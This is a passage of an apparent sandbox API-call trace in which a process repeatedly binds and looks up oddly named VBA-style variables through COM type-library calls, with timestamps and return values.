pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.791] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c4a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QA1G_UAZ") returned 9 [0068.792] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QA1G_UAZ", lHashVal=0x10154b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.792] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.792] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60c4a | out: _Dst=0x67c2d40) returned 0x0 [0068.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QA1G_UAZ") returned 0x10ed13 [0068.792] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_QA1G_UAZ" | out: _Dst="_B_var_QA1G_UAZ") returned 0x0 [0068.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_QA1G_UAZ") returned 16 [0068.792] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.792] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QA1G_UAZ", lHashVal=0x10ed13, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.792] IUnknown:Release (This=0x665ba50) returned 0xd [0068.792] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.792] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QA1G_UAZ", lHashVal=0x10ed13, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.792] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.792] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.792] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QA1G_UAZ", lHashVal=0x10ed13, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.792] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.792] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.792] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QA1G_UAZ", lHashVal=0x10ed13, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.792] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.792] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.792] IUnknown:Release (This=0x665ba50) returned 0xd [0068.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc256a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_QA1G_UAZ") returned 16 [0068.792] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QA1G_UAZ", lHashVal=0x10ed13, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x5f004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x5f004700000000, pDummy=0x0) returned 0x0 [0068.792] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60c4a | out: _Dst=0x144ec0) returned 0x0 [0068.792] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zAA4GAo_", lHashVal=0x10a21c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c76, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zAA4GAo_") returned 9 [0068.792] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zAA4GAo_", lHashVal=0x10a21c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c76, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zAA4GAo_") returned 9 [0068.792] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zAA4GAo_", lHashVal=0x10a21c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAA4GAo_") returned 0x10a21c [0068.792] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="zAA4GAo_" | out: _Dst="zAA4GAo_") returned 0x0 [0068.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="zAA4GAo_") returned 9 [0068.793] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.793] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zAA4GAo_", lHashVal=0x10a21c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.793] IUnknown:Release (This=0x665ba50) returned 0xd [0068.793] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.793] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zAA4GAo_", lHashVal=0x10a21c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.793] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.793] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.793] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zAA4GAo_", lHashVal=0x10a21c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.793] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.793] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.793] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zAA4GAo_", lHashVal=0x10a21c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.793] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c76, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zAA4GAo_") returned 9 [0068.793] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zAA4GAo_", lHashVal=0x10a21c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.793] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.793] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60c76 | out: _Dst=0x67c2d40) returned 0x0 [0068.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zAA4GAo_") returned 0x1079a5 [0068.793] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_zAA4GAo_" | out: _Dst="_B_var_zAA4GAo_") returned 0x0 [0068.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_zAA4GAo_") returned 16 [0068.793] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.793] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zAA4GAo_", lHashVal=0x1079a5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.793] IUnknown:Release (This=0x665ba50) returned 0xd [0068.793] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.793] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zAA4GAo_", lHashVal=0x1079a5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.793] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.793] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.793] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zAA4GAo_", lHashVal=0x1079a5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.793] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.793] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.793] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zAA4GAo_", lHashVal=0x1079a5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.793] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.793] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.793] IUnknown:Release (This=0x665ba50) returned 0xd [0068.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc259a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_zAA4GAo_") returned 16 [0068.793] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zAA4GAo_", lHashVal=0x1079a5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x47003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x47003400000000, pDummy=0x0) returned 0x0 [0068.793] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60c76 | out: _Dst=0x144ec0) returned 0x0 [0068.793] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fDBDGcA", lHashVal=0x10118f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60cca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fDBDGcA") returned 8 [0068.794] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fDBDGcA", lHashVal=0x10118f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60cca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fDBDGcA") returned 8 [0068.794] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fDBDGcA", lHashVal=0x10118f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fDBDGcA") returned 0x10118f [0068.794] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="fDBDGcA" | out: _Dst="fDBDGcA") returned 0x0 [0068.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="fDBDGcA") returned 8 [0068.794] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.794] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fDBDGcA", lHashVal=0x10118f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.794] IUnknown:Release (This=0x665ba50) returned 0xd [0068.794] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.794] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fDBDGcA", lHashVal=0x10118f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.794] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.794] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.794] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fDBDGcA", lHashVal=0x10118f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.794] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.794] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.794] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fDBDGcA", lHashVal=0x10118f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.794] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60cca, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fDBDGcA") returned 8 [0068.794] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fDBDGcA", lHashVal=0x10118f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.794] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.794] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60cca | out: _Dst=0x67c2d40) returned 0x0 [0068.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fDBDGcA") returned 0x100592 [0068.794] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_fDBDGcA" | out: _Dst="_B_var_fDBDGcA") returned 0x0 [0068.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_fDBDGcA") returned 15 [0068.794] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.794] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fDBDGcA", lHashVal=0x100592, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.794] IUnknown:Release (This=0x665ba50) returned 0xd [0068.794] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.794] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fDBDGcA", lHashVal=0x100592, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.794] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.794] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.795] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fDBDGcA", lHashVal=0x100592, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.795] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.795] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.795] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fDBDGcA", lHashVal=0x100592, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.795] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.795] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.795] IUnknown:Release (This=0x665ba50) returned 0xd [0068.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc25ca, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_fDBDGcA") returned 15 [0068.795] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fDBDGcA", lHashVal=0x100592, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x47004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x47004400000000, pDummy=0x0) returned 0x0 [0068.795] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60cca | out: _Dst=0x144ec0) returned 0x0 [0068.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ca2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QCoAAC") returned 7 [0068.795] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QCoAAC", lHashVal=0x10b4d0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ca2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QCoAAC") returned 7 [0068.795] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QCoAAC", lHashVal=0x10b4d0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ca2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QCoAAC") returned 7 [0068.795] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QCoAAC", lHashVal=0x10b4d0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QCoAAC") returned 0x10b4d0 [0068.795] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QCoAAC" | out: _Dst="QCoAAC") returned 0x0 [0068.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QCoAAC") returned 7 [0068.795] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.795] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QCoAAC", lHashVal=0x10b4d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.795] IUnknown:Release (This=0x665ba50) returned 0xd [0068.795] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.795] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QCoAAC", lHashVal=0x10b4d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.795] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.795] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.795] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QCoAAC", lHashVal=0x10b4d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.795] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.796] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.796] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QCoAAC", lHashVal=0x10b4d0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.796] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ca2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QCoAAC") returned 7 [0068.796] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QCoAAC", lHashVal=0x10b4d0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.796] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.796] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60ca2 | out: _Dst=0x67c2d40) returned 0x0 [0068.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QCoAAC") returned 0x102f3a [0068.796] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QCoAAC" | out: _Dst="_B_var_QCoAAC") returned 0x0 [0068.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QCoAAC") returned 14 [0068.796] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.796] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QCoAAC", lHashVal=0x102f3a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.796] IUnknown:Release (This=0x665ba50) returned 0xd [0068.796] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.796] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QCoAAC", lHashVal=0x102f3a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.796] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.796] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.796] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QCoAAC", lHashVal=0x102f3a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.796] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.796] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.796] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QCoAAC", lHashVal=0x102f3a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.796] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.796] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.796] IUnknown:Release (This=0x665ba50) returned 0xd [0068.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc25fa, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_QCoAAC") returned 14 [0068.796] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QCoAAC", lHashVal=0x102f3a, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.796] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60ca2 | out: _Dst=0x144ec0) returned 0x0 [0068.796] ITypeComp:RemoteBind (in: This=0x665ba60, szName="RACC1_", lHashVal=0x106c04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d1a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="RACC1_") returned 7 [0068.797] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="RACC1_", lHashVal=0x106c04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d1a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="RACC1_") returned 7 [0068.797] ITypeComp:RemoteBind (in: This=0x665bd30, szName="RACC1_", lHashVal=0x106c04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, 